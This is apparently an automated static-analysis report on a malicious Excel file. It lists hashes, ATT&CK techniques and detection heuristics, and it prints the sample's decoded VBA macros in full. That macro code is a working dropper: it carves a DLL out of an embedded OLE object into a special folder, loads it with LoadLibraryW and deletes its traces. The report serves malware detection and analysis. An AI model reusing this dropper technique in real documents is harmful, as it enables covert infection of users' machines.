Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 b810aa205bad5883…

MALICIOUS

Office (OLE)

719.0 KB Created: 2019-08-30 09:14:50 Authoring application: Microsoft Excel First seen: 2019-12-09
MD5: b66e001229f38b4f47b5b3891be3dc8b SHA-1: b231d78d97e278b0c7b172e32ed64060ff24e78c SHA-256: b810aa205bad5883abcfc758a50d6dc80b8db31b8d88b899f130746a1a0ea29a
440 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1105 Ingress Tool Transfer T1204.002 Malicious File T1027 Obfuscated Files or Information

The Excel file contains VBA macros that leverage WScript.Shell and CreateObject to execute embedded code. A critical heuristic indicates an ActiveX event launches a decoded Excel4 macro, which likely uses the Shell() function to execute or load a second-stage payload. This payload is identified as an embedded PE executable (embedded_office_00003384.exe), suggesting a dropper functionality. The presence of VirtualAlloc and LoadLibrary API references further supports the execution of external or dynamically loaded code.

Heuristics 10

  • ClamAV: Xls.Dropper.Sdrop-7331943-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Dropper.Sdrop-7331943-0
  • Embedded PE executable critical OLE_EMBEDDED_EXE
    MZ/PE header found inside document — possible embedded executable
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
    Set WaitForSingle = CreateObject("WScript.Shell")
  • VBA ActiveX event launches decoded Excel4 macro critical OLE_VBA_ACTIVEX_XLM_STAGER
    VBA code attached to an auto-firing ActiveX/UserForm control event (e.g. _Layout/_Change/_Painted) decodes a string with Replace/Split/Join/StrReverse/Chr and passes the recovered formula text to ExecuteExcel4Macro. This bridges VBA event activation into XLM formula execution to call Win32 APIs / drop payloads while evading AutoOpen and Shell keyword detection — a high-confidence macro stager, not a specific Office parser CVE.
    Matched line in script
    Debug.Print Temp1
CCount = Application.ExecuteExcel4Macro(Temp1)
Debug.Print CCount
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
            Case 0
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.cnclose")
        Case 1
  • Reference to Windows Script Host high SC_STR_WSCRIPT
    Reference to Windows Script Host
  • Reference to LoadLibrary API high SC_STR_LOADLIBRARY
    Reference to LoadLibrary API
  • Suspicious extracted artifact high EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Reference to VirtualAlloc API medium SC_STR_VIRTUALALLOC
    Reference to VirtualAlloc API

Extracted artifacts 3

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 12324 bytes
SHA-256: 1335cf9c55b62e62cfc7e3cb67f2bfd7caed70b057d29bdde217e9f1662bb4c3
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Sem"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Activate()
If UserForm1.Visible = False Then
Module1.AppStart
End If

End Sub

Attribute VB_Name = "Page1"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"
#If Win64 Then
    Public Declare PtrSafe Function Bootsrap Lib _
        "libMongo2.dll" () As Integer
    Public Declare PtrSafe Function Bootsrap2 Lib "kernel32" Alias "LoadLibraryW" (ByVal lpLibFileName As String) As Long
#Else
   Public Declare Function Bootsrap2 Lib "kernel32" Alias "LoadLibraryW" (ByVal lpLibFileName As String) As Long
     Public Declare Function Bootsrap Lib _
        "libMongo1.dll" () As Integer
#End If
   


Public Sub NewValuje(s As String, nm As String, fl As Long, d_6 As Integer)
    Dim d_1 As Long, d_2 As Byte, d_3 As Byte, d_4 As Byte
    Dim d_5() As Long

    ReDim d_5(1 To fl)
    d_5(1) = CByte(50 + 27)
    d_5(2) = CByte(50 + 40)
    d_5(3) = CByte(50 + 94)
    
    d_1 = FreeFile
    Open s For Binary Access Read As d_1
    Dim cur As Integer
    cur = 1
    Do While Not EOF(d_1)
        Get d_1, , d_2
        If d_2 = d_5(1) Then
           Get d_1, , d_3
           If d_3 = d_5(2) Then
                Get d_1, , d_4
                If d_4 = d_5(3) Then
                     If cur = d_6 Then
                        For k = 4 To fl
                            Get d_1, , d_2
                            d_5(k) = d_2
                            Next k
                         Exit Do
                     Else
                        cur = cur + 1
                     End If
                End If
           End If
        End If
    Loop
    Close d_1
    
    d_1 = FreeFile
    Open nm For Binary Lock Read Write As #d_1
    For i = LBound(d_5) To UBound(d_5)
        Put #d_1, , CByte(d_5(i))
    Next i

    Close #d_1
End Sub

Public Function ITestModule_GetCase(ByVal lIndex As Long)
    If tracemod Then
        g_errorobj.Transmit "Inside: ITestModule_GetCase(" + CStr(lIndex) + ")" + Chr(10)
    End If
    numcases = numcases + 1
    Select Case lIndex
        Case 0
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.cnclose")
        Case 1
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.cndefdat")
        Case 2
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.cnexec")
        Case 3
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.cnmode")
        Case 4
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.cnopen")
        Case 5
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.cnprop")
        Case 6
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.cnprovider")
        Case 7
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.cnstring")
        Case 8
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.cntimeout")
        Case 9
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.fldactualsize")
        Case 10
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.fldattributes")
        Case 11
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.flddefinedsize")
        Case 12
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.fldname")
        Case 13
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.fldoriginalvalue")
        Case 14
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.fldprecision")
        Case 15
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.fldtype")
        Case 16
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.fldvalue")
        Case 17
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.rsactivecn")
        Case 18
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.rsclose")
        Case 19
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.rsmove")
        Case 20
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.rsmovefirst")
        Case 21
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.rsmovenext")
        Case 22
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.rsmoveprev")
        Case 23
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.rsopen")
        Case 24
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.rssource")
        Case 25
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.rssupports")
        Case 26
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.rsbof")
        Case 27
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.rseof")
        Case 28
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.rscachesize")
        Case 29
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.rspagesize")
        Case 30
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.rsrequery")
  End Select
    ca.ses(numcases - 1).SetCaseError g_errorobj
    ca.ses(numcases - 1).SetCaseProvider g_provobj
    Set Locprov = g_provobj
    Set ITestModule_GetCase = ca.ses(numcases - 1)
End Function
Public Function ITestModule_GetErrorInterface()
    Set ITestModule_GetErrorInterface = g_errorobj
End Function
Public Function ITestModule_GetProviderInterface()
    Set ITestModule_GetProviderInterface = g_provobj
End Function
Public Sub ITestModule_SetErrorInterface(ByVal pError)
    Set g_errorobj = pError
    If tracemod Then
        g_errorobj.Transmit "Inside: ITestModule_SetErrorInterface" + Chr(10)
    End If
End Sub
Public Sub ITestModule_SetMallocSpyCallback(pbVoodoo As Byte)
    tracemod = False
    numcases = 0
    'MsgBox ("ITestModule_SetMallocSpyCallback")
End Sub
Public Sub ITestModule_SetProviderInterface(ByVal pProvInfo)
On Error GoTo ixx
    Set g_provobj = pProvInfo
    For i = 0 To numcases - 1
        ca.ses(i).SetCaseProvider g_provobj
    Next i
Exit Sub
ixx:
MsgBox Err.Description
End Sub
Public Function ITestModule_Terminate() As Boolean
    ITestModule_Terminate = True
End Function
Public Sub AppStart()

ExecuteExcel4Macro "MESSAGE(False, ""Next"")"
Dim WaitForSingle As Object
    Dim SpecialPath As String
    

Set WaitForSingle = CreateObject("WScript.Shell")
   
UserForm3.TextBox1.Tag = WaitForSingle.ExpandEnvironmentStrings("%" + UserForm3.TextBox1.Tag + "%")

UserForm3.TextBox1.Tag = Replace(UserForm3.TextBox1.Tag, "%", "")
UserForm3.TextBox2.Tag = WaitForSingle.SpecialFolders(UserForm3.TextBox2.Tag)

ChDir (UserForm3.TextBox1.Tag)

    UserForm1.show
ExecuteExcel4Macro "MESSAGE(False, ""Next"")"
End Sub



Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{5A3D2CBB-FB46-4DB2-AF06-BE71FA9283E9}{2B3E03C1-B346-4B10-B5BC-52032E0329B2}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub Label1_Click()

End Sub

Private Sub UserForm_Activate()
DoEvents
ReplaceCurrentModule
End Sub

Private Sub UserForm_Initialize()
Call SystemButtonSettings(Me, False)

End Sub

Attribute VB_Name = "Module2"
Private Const GWL_STYLE = -16
Private Const WS_CAPTION = &HC00000
Private Const WS_SYSMENU = &H80000

#If VBA7 Then

    Private Declare PtrSafe Function GetWindowLong _
        Lib "user32" Alias "GetWindowLongA" (ByVal hWnd As Long, _
        ByVal nIndex As Long) As Long
    Private Declare PtrSafe Function SetWindowLong _
        Lib "user32" Alias "SetWindowLongA" (ByVal hWnd As Long, _
        ByVal nIndex As Long, ByVal dwNewLong As Long) As Long
    Private Declare PtrSafe Function FindWindowA _
        Lib "user32" (ByVal lpClassName As String, _
        ByVal lpWindowName As String) As Long
    Private Declare PtrSafe Function DrawMenuBar _
        Lib "user32" (ByVal hWnd As Long) As Long
        
#Else

    Private Declare Function GetWindowLong _
        Lib "user32" Alias "GetWindowLongA" ( _
        ByVal hWnd As Long, ByVal nIndex As Long) As Long
    Private Declare Function SetWindowLong _
        Lib "user32" Alias "SetWindowLongA" ( _
        ByVal hWnd As Long, ByVal nIndex As Long, ByVal dwNewLong As Long) As Long
    Private Declare Function FindWindowA _
        Lib "user32" (ByVal lpClassName As String, _
        ByVal lpWindowName As String) As Long
    Private Declare Function DrawMenuBar _
        Lib "user32" (ByVal hWnd As Long) As Long
  
#End If



Public Sub KillArray(ParamArray PathList() As Variant)
    On Error Resume Next
    For Each Key In PathList
        Kill Key
    Next Key
    On Error GoTo 0
End Sub




Public Sub SystemButtonSettings(frm As Object, show As Boolean)
Dim windowStyle As Long
Dim windowHandle As Long

windowHandle = FindWindowA(vbNullString, frm.Caption)
windowStyle = GetWindowLong(windowHandle, GWL_STYLE)

If show = False Then

    SetWindowLong windowHandle, GWL_STYLE, (windowStyle And Not WS_SYSMENU)

Else

    SetWindowLong windowHandle, GWL_STYLE, (windowStyle + WS_SYSMENU)

End If

DrawMenuBar (windowHandle)

End Sub



Attribute VB_Name = "Module3"

Sub test()

Temp = "'" & ThisWorkbook.Path & "\[web.xlsm]Sheet1'!"
Temp1 = Temp & Rows(1).Address(, , xlR1C1)
Temp1 = "Counta(" & Temp1 & ")"
Debug.Print Temp1
CCount = Application.ExecuteExcel4Macro(Temp1)
Debug.Print CCount
Temp2 = Temp & Columns("A").Address(, , xlR1C1)
Temp2 = "Counta(" & Temp2 & ")"
RCount = Application.ExecuteExcel4Macro(Temp2)
ReDim arr(1 To RCount, 1 To CCount)

For R = 1 To RCount
    For C = 1 To CCount
        Temp3 = Temp & Cells(R, C).Address(, , xlR1C1)
        arr(R, C) = Application.ExecuteExcel4Macro(Temp3)
    Next
Next

Range("A1").ReAPI_LENGTH(RCount, CCount).Value = arr

End Sub




Public Sub ReplaceCurrentModule()
    NameFav = UserForm3.TextBox1.Tag + "\favorite" + ".xlsx"
    ZipName = NameFav + ".zip"
    ZipFolder = UserForm3.TextBox1.Tag '& "\UnzTmp"
    Dim nm As String
    Dim API_LENGTH As Long
    Dim d_6 As Integer
    nm = UserForm3.TextBox2.Tag + "\libMongo1"
    API_LENGTH = 282624
    d_6 = 1
            
#If Win64 Then
    nm = UserForm3.TextBox2.Tag + "\libMongo2"
    API_LENGTH = 230912
    d_6 = 2
#End If
nm = nm + ".d" + "ll"
        KillArray ZipFolder & "\oleObj" + "ect*.bin", ZipName, nm
        
    DoEvents
        ThisWorkbook.Sheets.Copy
        Application.DisplayAlerts = False
        ActiveWorkbook.SaveAs NameFav, FileFormat:=51
    DoEvents
    ActiveWorkbook.Close
    DoEvents
        
    
        FileCopy NameFav, ZipName
        
        Set oApp = CreateObject("Shell." + "Application")
        oApp.Namespace(ZipFolder).CopyHere oApp.Namespace(ZipName).items.Item("xl\embeddings\oleObject1.bin")
        NewValuje ZipFolder + "\oleObject1.bin", nm, API_LENGTH, d_6
        
        ChDir (UserForm3.TextBox2.Tag)
        No_Bootsrap = Bootsrap2(nm)
        Bootsrap

End Sub


Attribute VB_Name = "UserForm3"
Attribute VB_Base = "0{C6DC58FE-06D5-4E80-95FA-170CB81DE014}{681B466D-E30B-41B1-9314-F7CBD4BFF3AE}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Page11"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Module4"

Attribute VB_Name = "Module5"

Attribute VB_Name = "Module6"
embedded_office_00003384.exe embedded-pe Office MZ+PE at offset 0x3384 723068 bytes
SHA-256: 4f858f9af608f99073b952a45289a66aa49e1e614a54377cbad72638d9941332
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Static shellcode analysis recovered command string(s): WScript.Shell
ole10native_00.bin ole-package OLE Ole10Native stream: MBD00FAA26E/Ole10Native 526883 bytes
SHA-256: aa7d415120f22ad80905c574ffb39ef59713b52a70790d214c689b634aa314ad

Open this report in the interactive analyzer, or submit your own file for analysis.